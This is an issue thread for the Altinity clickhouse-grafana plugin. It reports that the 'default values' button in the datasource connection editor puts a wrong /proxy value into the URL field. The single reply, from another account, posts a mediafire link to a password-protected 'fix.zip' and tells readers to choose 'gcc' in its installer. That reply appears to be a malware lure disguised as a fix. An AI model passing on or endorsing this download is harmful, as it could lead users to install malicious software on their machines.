### ISSUE TITLE
default values in connection editor just doesn't work

### ISSUE THREAD

**Issue by Slach** [Altinity/clickhouse-grafana#615]
steps to reproduce
- create datasource
- press save & test
- press "default values"
- press "CORS" or something similar

error behavior
url form field replaced to wrong /proxy value

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
